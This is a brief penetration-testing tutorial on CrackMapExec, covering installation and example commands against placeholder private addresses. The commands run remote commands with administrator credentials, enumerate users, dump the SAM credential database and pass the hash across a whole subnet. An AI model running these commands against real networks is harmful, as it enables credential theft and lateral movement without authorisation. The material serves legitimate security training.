S1REN

Going down the range.

So lets discuss a bit about Crack Map Execute.



The more targeted your user/pass or hash list - the more targeted your attack.
This tool is the go-to tool for internal engagements when performing large sweeps or 'Credential Spray' Attacks across a variety of protocols.

I encourage you to do some research on what protocols crackmapexec supports!

+ Here's where you're going to get it:
https://github.com/byt3bl33d3r/CrackMapExec

+ Python Package:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec

+ Install From Source:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec

Examples:
--> Execute 'whoami'
crackmapexec 192.168.1.5 -u Administrator -p 'PASS' -x whoami
-->Show Domain Administrators.
crackmapexec 192.168.1.5 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PS Version Table:
crackmapexec 192.168.1.5 -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List out Machine Users.
crackmapexec 192.168.1.5 -u 'Administrator' -p 'PASS' --lusers
--> Dump SAM Database.
crackmapexec 192.168.1.0/24 -u 'Administrator' -p 'PASS' --local-auth --sam
--> Lets Pass The Hash against an entire subnet!
crackmapexec smb 192.168.1.0/24 -u 'Administrator' -H 'LM:NTLM' --local-auth

Don't mind me - just pwning an entire network in one sweep...
CrackMapExec!